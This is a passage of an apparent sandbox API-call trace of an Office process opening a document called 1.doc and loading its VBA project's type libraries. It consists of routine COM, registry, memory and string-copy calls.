riid=0x7ffce0bccce8*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb3e58 | out: ppvObject=0x33e4fb3e58*=0x0) returned 0x80004002 [0058.927] ITypeLib:RemoteIsName (in: This=0x1d3980655f0, szNameBuf="stdole", lHashVal=0x506093, pfName=0x33e4fb4010, pBstrLibName=0x33e4fb3f40 | out: pfName=0x33e4fb4010*=0, pBstrLibName=0x33e4fb3f40) returned 0x0 [0058.927] IUnknown:Release (This=0x1d3980655f0) returned 0x4 [0058.927] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x24) returned 0x1d398218f40 [0058.927] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d7b54b0) [0058.927] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x20) returned 0x1d398219780 [0058.927] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d398219780, cb=0x50) returned 0x1d39d7676c0 [0058.927] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d398218f40) [0058.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=-1, lpMultiByteStr=0x33e4fb4280, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0058.928] _stat64i32 (in: _FileName="Normal", _Stat=0x33e4fb4428 | out: _Stat=0x33e4fb4428) returned -1 [0058.929] wcscpy_s (in: _Destination=0x1d398218cde, _SizeInWords=0x7, _Source="Normal" | out: _Destination="Normal") returned 0x0 [0058.929] wcscpy_s (in: _Destination=0x1d39d9cb5a8, _SizeInWords=0xa, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0 [0058.929] wcsncpy_s (in: _Destination=0x33e4fb4030, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0058.929] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0058.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x33e4fb3f60, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0058.929] wcscpy_s (in: _Destination=0x1d39d9e74f0, _SizeInWords=0xa, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0 [0058.929] wcsncpy_s (in: _Destination=0x33e4fb4070, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0058.929] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0058.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x33e4fb3fa0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0058.929] wcsncpy_s (in: _Destination=0x33e4fb4030, _SizeInWords=0x108, _Source="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc") returned 0x0 [0058.929] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc", cchLength=0x20 | out: lpsz="*\\cc:\\users\\fd1hvy\\desktop\\1.doc") returned 0x20 [0058.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\fd1hvy\\desktop\\1.doc", cchWideChar=33, lpMultiByteStr=0x33e4fb3f60, cbMultiByte=66, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\fd1hvy\\desktop\\1.doc", lpUsedDefaultChar=0x0) returned 33 [0058.929] _wcsicmp (_String1="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc", _String2="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc") returned 0 [0058.929] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d9e70d0, cb=0x880) returned 0x1d39d7de050 [0058.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x33e4fb4310, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0058.930] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Normal") returned 0x50d8df [0058.930] strcpy_s (in: _Dst=0x33e4fb40f0, _DstSize=0x7, _Src="Normal" | out: _Dst="Normal") returned 0x0 [0058.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb40f0, cbMultiByte=7, lpWideCharStr=0x33e4fb3f40, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0058.930] IUnknown:AddRef (This=0x1d3980663b0) returned 0x3 [0058.930] ITypeLib:RemoteIsName (in: This=0x1d3980663b0, szNameBuf="Normal", lHashVal=0x50d8df, pfName=0x33e4fb4010, pBstrLibName=0x33e4fb3f40 | out: pfName=0x33e4fb4010*=0, pBstrLibName=0x33e4fb3f40) returned 0x0 [0058.930] IUnknown:Release (This=0x1d3980663b0) returned 0x2 [0058.930] IUnknown:AddRef (This=0x1d3985c4c00) returned 0x4 [0058.930] ITypeLib:RemoteIsName (in: This=0x1d3985c4c00, szNameBuf="Normal", lHashVal=0x50d8df, pfName=0x33e4fb4010, pBstrLibName=0x33e4fb3f40 | out: pfName=0x33e4fb4010*=0, pBstrLibName=0x33e4fb3f40) returned 0x0 [0058.930] IUnknown:Release (This=0x1d3985c4c00) returned 0x3 [0058.930] IUnknown:AddRef (This=0x1d3980655f0) returned 0x5 [0058.930] ITypeLib:RemoteIsName (in: This=0x1d3980655f0, szNameBuf="Normal", lHashVal=0x50d8df, pfName=0x33e4fb4010, pBstrLibName=0x33e4fb3f40 | out: pfName=0x33e4fb4010*=0, pBstrLibName=0x33e4fb3f40) returned 0x0 [0058.930] IUnknown:Release (This=0x1d3980655f0) returned 0x4 [0058.930] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x30) returned 0x1d39d44a7e0 [0058.930] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d7676c0) [0058.930] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x20) returned 0x1d3982196f0 [0058.930] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d3982196f0, cb=0x5c) returned 0x1d39d84dd90 [0058.930] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d44a7e0) [0058.930] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x9a) returned 0x1d398705460 [0058.931] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d398705460) [0058.931] CLSIDFromString (in: lpsz="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}", pclsid=0x33e4fb43e0 | out: pclsid=0x33e4fb43e0*(Data1=0x2df8d04c, Data2=0x5bfa, Data3=0x101b, Data4=([0]=0xbd, [1]=0xe5, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x44, [6]=0xde, [7]=0x52))) returned 0x0 [0058.931] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x8c) returned 0x1d39d7eaa40 [0058.931] _ultow_s (in: _Value=0x2, _Buffer=0x33e4fb426a, _BufferCount=0x10, _Radix=16 | out: _Buffer="2") returned 0x0 [0058.931] _ultow_s (in: _Value=0x8, _Buffer=0x33e4fb426e, _BufferCount=0xe, _Radix=16 | out: _Buffer="8") returned 0x0 [0058.931] _ultow_s (in: _Value=0x0, _Buffer=0x33e4fb4272, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0058.931] wcscpy_s (in: _Destination=0x1d3984262a8, _SizeInWords=0x9b, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0058.931] wcscpy_s (in: _Destination=0x1d3984262ae, _SizeInWords=0x98, _Source="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}" | out: _Destination="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}") returned 0x0 [0058.931] wcscpy_s (in: _Destination=0x1d3984262fa, _SizeInWords=0x72, _Source="#2.8#0#" | out: _Destination="#2.8#0#") returned 0x0 [0058.931] wcscpy_s (in: _Destination=0x1d398426308, _SizeInWords=0x6b, _Source="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE12\\MSO.DLL" | out: _Destination="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE12\\MSO.DLL") returned 0x0 [0058.931] wcscpy_s (in: _Destination=0x1d398426394, _SizeInWords=0x25, _Source="Microsoft Office 12.0 Object Library" | out: _Destination="Microsoft Office 12.0 Object Library") returned 0x0 [0058.931] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d7eaa40) [0058.931] wcsncpy_s (in: _Destination=0x1d398362fd8, _SizeInWords=0x9b, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE12\\MSO.DLL#Microsoft Office 12.0 Object Library", _MaxCount=0x30 | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#") returned 0x0 [0058.931] wcscpy_s (in: _Destination=0x1d398363038, _SizeInWords=0x6b, _Source="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE12\\MSO.DLL" | out: _Destination="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE12\\MSO.DLL") returned 0x0 [0058.931] wcscpy_s (in: _Destination=0x1d3983630c2, _SizeInWords=0x26, _Source="#Microsoft Office 12.0 Object Library" | out: _Destination="#Microsoft Office 12.0 Object Library") returned 0x0 [0058.932] wcscpy_s (in: _Destination=0x1d39d9cb700, _SizeInWords=0x9b, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE12\\MSO.DLL#Microsoft Office 12.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE12\\MSO.DLL#Microsoft Office 12.0 Object Library") returned 0x0 [0058.932] wcsncpy_s (in: _Destination=0x33e4fb4030, _SizeInWords=0x108, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE12\\MSO.DLL#Microsoft Office 12.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE12\\MSO.DLL#Microsoft Office 12.0 Object Library") returned 0x0 [0058.932] CharLowerBuffW (in: lpsz="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE12\\MSO.DLL#Microsoft Office 12.0 Object Library", cchLength=0x9a | out: lpsz="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files (x86)\\common files\\microsoft shared\\office12\\mso.dll#microsoft office 12.0 object library") returned 0x9a [0058.932] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x136) returned 0x1d39d9c33e0 [0058.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files (x86)\\common files\\microsoft shared\\office12\\mso.dll#microsoft office 12.0 object library", cchWideChar=155, lpMultiByteStr=0x1d39d9c33e0, cbMultiByte=310, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files (x86)\\common files\\microsoft shared\\office12\\mso.dll#microsoft office 12.0 object library", lpUsedDefaultChar=0x0) returned 155 [0058.932] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d9c33e0) [0058.932] wcscpy_s (in: _Destination=0x1d39d7de4b8, _SizeInWords=0x9b, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE12\\MSO.DLL#Microsoft Office 12.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE12\\MSO.DLL#Microsoft Office 12.0 Object Library") returned 0x0 [0058.932] wcsncpy_s (in: _Destination=0x33e4fb4070, _SizeInWords=0x108, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE12\\MSO.DLL#Microsoft Office 12.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE12\\MSO.DLL#Microsoft Office 12.0 Object Library") returned 0x0 [0058.932] CharLowerBuffW (in: lpsz="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE12\\MSO.DLL#Microsoft Office 12.0 Object Library", cchLength=0x9a | out: lpsz="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files (x86)\\common files\\microsoft shared\\office12\\mso.dll#microsoft office 12.0 object library") returned 0x9a [0058.932] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x136) returned 0x1d39d9c38e0 [0058.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files (x86)\\common files\\microsoft shared\\office12\\mso.dll#microsoft office 12.0 object library", cchWideChar=155, lpMultiByteStr=0x1d39d9c38e0, cbMultiByte=310, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files (x86)\\common files\\microsoft shared\\office12\\mso.dll#microsoft office 12.0 object library", lpUsedDefaultChar=0x0) returned 155 [0058.932] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d9c38e0) [0058.932] wcsncpy_s (in: _Destination=0x33e4fb4030, _SizeInWords=0x108, _Source="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc") returned 0x0 [0058.932] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc", cchLength=0x20 | out: lpsz="*\\cc:\\users\\fd1hvy\\desktop\\1.doc") returned 0x20 [0058.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\fd1hvy\\desktop\\1.doc", cchWideChar=33, lpMultiByteStr=0x33e4fb3f60, cbMultiByte=66, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\fd1hvy\\desktop\\1.doc", lpUsedDefaultChar=0x0) returned 33 [0058.932] _wcsicmp (_String1="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc", _String2="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc") returned 0 [0058.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=7, lpMultiByteStr=0x33e4fb4310, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office", lpUsedDefaultChar=0x0) returned 7 [0058.932] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Office") returned 0x507515 [0058.932] strcpy_s (in: _Dst=0x33e4fb40f0, _DstSize=0x7, _Src="Office" | out: _Dst="Office") returned 0x0 [0058.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb40f0, cbMultiByte=7, lpWideCharStr=0x33e4fb3f40, cchWideChar=7 | out: lpWideCharStr="Office") returned 7 [0058.932] IUnknown:AddRef (This=0x1d3980663b0) returned 0x3 [0058.932] ITypeLib:RemoteIsName (in: This=0x1d3980663b0, szNameBuf="Office", lHashVal=0x507515, pfName=0x33e4fb4010, pBstrLibName=0x33e4fb3f40 | out: pfName=0x33e4fb4010*=0, pBstrLibName=0x33e4fb3f40) returned 0x0 [0058.932] IUnknown:Release (This=0x1d3980663b0) returned 0x2 [0058.932] IUnknown:AddRef (This=0x1d3985c4c00) returned 0x4 [0058.932] ITypeLib:RemoteIsName (in: This=0x1d3985c4c00, szNameBuf="Office", lHashVal=0x507515, pfName=0x33e4fb4010, pBstrLibName=0x33e4fb3f40 | out: pfName=0x33e4fb4010*=0, pBstrLibName=0x33e4fb3f40) returned 0x0 [0058.932] IUnknown:Release (This=0x1d3985c4c00) returned 0x3 [0058.933] IUnknown:AddRef (This=0x1d3980655f0) returned 0x5 [0058.933] ITypeLib:RemoteIsName (in: This=0x1d3980655f0, szNameBuf="Office", lHashVal=0x507515, pfName=0x33e4fb4010, pBstrLibName=0x33e4fb3f40 | out: pfName=0x33e4fb4010*=0, pBstrLibName=0x33e4fb3f40) returned 0x0 [0058.933] IUnknown:Release (This=0x1d3980655f0) returned 0x4 [0058.933] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x1000) returned 0x1d3984adf80 [0058.933] wcscpy_s (in: _Destination=0x1d398362fd8, _SizeInWords=0x9b, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE12\\MSO.DLL#Microsoft Office 12.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE12\\MSO.DLL#Microsoft Office 12.0 Object Library") returned 0x0 [0058.933] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="TypeLib", phkResult=0x33e4fb36f0 | out: phkResult=0x33e4fb36f0*=0x11de) returned 0x0 [0058.933] RegOpenKeyW (in: hKey=0x11de, lpSubKey="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}", phkResult=0x33e4fb36e8 | out: phkResult=0x33e4fb36e8*=0x11e6) returned 0x0 [0058.933] RegEnumKeyW (in: hKey=0x11e6, dwIndex=0x0, lpName=0x33e4fb3718, cchName=0xa | out: lpName="2.6") returned 0x0 [0058.933] RegEnumKeyW (in: hKey=0x11e6, dwIndex=0x1, lpName=0x33e4fb3718, cchName=0xa | out: lpName="2.7") returned 0x0 [0058.933] RegEnumKeyW (in: hKey=0x11e6, dwIndex=0x2, lpName=0x33e4fb3718, cchName=0xa | out: lpName="2.8") returned 0x0 [0058.934] wcscpy_s (in: _Destination=0x33e4fb3700, _SizeInWords=0xa, _Source="2.8" | out: _Destination="2.8") returned 0x0 [0058.934] RegOpenKeyW (in: hKey=0x11e6, lpSubKey="2.8", phkResult=0x33e4fb37a8 | out: phkResult=0x33e4fb37a8*=0x1212) returned 0x0 [0058.934] _ultoa_s (in: _Val=0x0, _DstBuf=0x33e4fb3720, _Size=0xa, _Radix=16 | out: _DstBuf="0") returned 0x0 [0058.934] RegOpenKeyA (in: hKey=0x1212, lpSubKey="0", phkResult=0x33e4fb3710 | out: phkResult=0x33e4fb3710*=0x121a) returned 0x0 [0058.934] RegOpenKeyW (in: hKey=0x121a, lpSubKey="win64", phkResult=0x33e4fb3718 | out: phkResult=0x33e4fb3718*=0x1222) returned 0x0 [0058.934] RegCloseKey (hKey=0x1222) returned 0x0 [0058.934] RegCloseKey (hKey=0x121a) returned 0x0 [0058.934] _ultow_s (in: _Value=0x0, _Buffer=0x33e4fb37b0, _BufferCount=0x9, _Radix=16 | out: _Buffer="0") returned 0x0 [0058.934] RegOpenKeyW (in: hKey=0x1212, lpSubKey="0", phkResult=0x33e4fb3788 | out: phkResult=0x33e4fb3788*=0x1216) returned 0x0 [0058.934] RegQueryValueW (in: hKey=0x1216, lpSubKey="win64", lpData=0x33e4fb37d0, lpcbData=0x33e4fb3784 | out: lpData="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL", lpcbData=0x33e4fb3784) returned 0x0 [0058.935] wcscpy_s (in: _Destination=0x1d3984adf80, _SizeInWords=0x800, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0058.935] RegCloseKey (hKey=0x1216) returned 0x0 [0058.935] RegCloseKey (hKey=0x1212) returned 0x0 [0058.935] RegCloseKey (hKey=0x11e6) returned 0x0 [0058.935] RegCloseKey (hKey=0x11de) returned 0x0 [0058.935] LoadTypeLib (in: szFile="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL", pptlib=0x33e4fb3df8*=0x0 | out: pptlib=0x33e4fb3df8*=0x1d3985c5700) returned 0x0 [0058.950] IUnknown:QueryInterface (in: This=0x1d3985c5700, riid=0x7ffce0bcb198*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb3bf8 | out: ppvObject=0x33e4fb3bf8*=0x0) returned 0x80004002 [0058.950] ITypeLib:RemoteGetLibAttr (in: This=0x1d3985c5700, ppTLibAttr=0x33e4fb3bf0, pDummy=0x33e4fb3bf8 | out: ppTLibAttr=0x33e4fb3bf0, pDummy=0x33e4fb3bf8*=0x0) returned 0x0 [0058.951] ITypeLib:RemoteGetDocumentation (in: This=0x1d3985c5700, index=-1, refPtrFlags=0x0, pBstrName=0x33e4fb3be8, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1d398363036 | out: pBstrName=0x33e4fb3be8*="Microsoft Office 16.0 Object Library", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1d398363036) returned 0x0 [0058.951] StringFromGUID2 (in: rguid=0x1d3982191b0*(Data1=0x2df8d04c, Data2=0x5bfa, Data3=0x101b, Data4=([0]=0xbd, [1]=0xe5, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x44, [6]=0xde, [7]=0x52)), lpsz=0x33e4fb3c10, cchMax=39 | out: lpsz="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}") returned 39 [0058.951] _ultow_s (in: _Value=0x2, _Buffer=0x33e4fb3b5a, _BufferCount=0x10, _Radix=16 | out: _Buffer="2") returned 0x0 [0058.951] _ultow_s (in: _Value=0x8, _Buffer=0x33e4fb3b5e, _BufferCount=0xe, _Radix=16 | out: _Buffer="8") returned 0x0 [0058.951] _ultow_s (in: _Value=0x0, _Buffer=0x33e4fb3b62, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0058.951] wcscpy_s (in: _Destination=0x1d39d9ec5d8, _SizeInWords=0x95, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0058.951] wcscpy_s (in: _Destination=0x1d39d9ec5de, _SizeInWords=0x92, _Source="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}" | out: _Destination="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}") returned 0x0 [0058.951] wcscpy_s (in: _Destination=0x1d39d9ec62a, _SizeInWords=0x6c, _Source="#2.8#0#" | out: _Destination="#2.8#0#") returned 0x0 [0058.951] wcscpy_s (in: _Destination=0x1d39d9ec638, _SizeInWords=0x65, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0058.951] wcscpy_s (in: _Destination=0x1d39d9ec6b8, _SizeInWords=0x25, _Source="Microsoft Office 16.0 Object Library" | out: _Destination="Microsoft Office 16.0 Object Library") returned 0x0 [0058.951] ITypeLib:LocalReleaseTLibAttr (This=0x1d3985c5700) returned 0x0 [0058.951] wcscpy_s (in: _Destination=0x1d3984adf80, _SizeInWords=0x800, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0058.951] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d9cb2c0, cb=0xd00) returned 0x1d39da0d900 [0058.951] wcscpy_s (in: _Destination=0x1d39da0de78, _SizeInWords=0x95, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0058.951] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3984adf80) [0058.952] IUnknown:AddRef (This=0x1d3985c5700) returned 0x2 [0058.952] IUnknown:QueryInterface (in: This=0x1d3985c5700, riid=0x7ffce0bccce8*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb3e58 | out: ppvObject=0x33e4fb3e58*=0x0) returned 0x80004002 [0058.952] ITypeLib:RemoteIsName (in: This=0x1d3985c5700, szNameBuf="Office", lHashVal=0x507515, pfName=0x33e4fb4010, pBstrLibName=0x33e4fb3f40 | out: pfName=0x33e4fb4010*=0, pBstrLibName=0x33e4fb3f40) returned 0x0 [0058.952] IUnknown:Release (This=0x1d3985c5700) returned 0x1 [0058.952] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x3c) returned 0x1d39d7b58c0 [0058.952] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d84dd90) [0058.952] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x20) returned 0x1d398212f40 [0058.952] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d398212f40, cb=0x68) returned 0x1d39d84e960 [0058.952] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d7b58c0) [0058.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x33e4fb4150, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0058.954] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ThisDocument") returned 0x509e3c [0058.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x33e4fb4290, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0058.954] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ThisDocument") returned 0x509e3c [0058.954] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d4a82a0, cb=0x8) returned 0x1d39d4a8ca0 [0058.954] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x80) returned 0x1d39d83dbd0 [0058.954] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39d83dbd0) returned 0x80 [0058.954] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb8) returned 0x1d39d7fcf50 [0058.954] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb8) returned 0x1d39d7fd3d0 [0058.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x33e4fb4150, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0058.954] CoCreateGuid (in: pguid=0x33e4fb3e80 | out: pguid=0x33e4fb3e80*(Data1=0x1b042c89, Data2=0xb944, Data3=0x40f5, Data4=([0]=0xab, [1]=0x8e, [2]=0x3d, [3]=0xcc, [4]=0xbc, [5]=0x43, [6]=0x5, [7]=0x6e))) returned 0x0 [0058.954] 